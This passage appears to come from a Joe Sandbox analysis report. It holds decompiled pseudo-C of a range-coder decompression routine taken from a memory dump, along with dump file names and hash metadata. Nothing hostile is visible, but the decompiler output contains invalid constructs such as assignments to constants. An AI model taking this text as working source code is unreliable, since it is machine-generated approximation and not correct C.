													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406409, Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406409() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
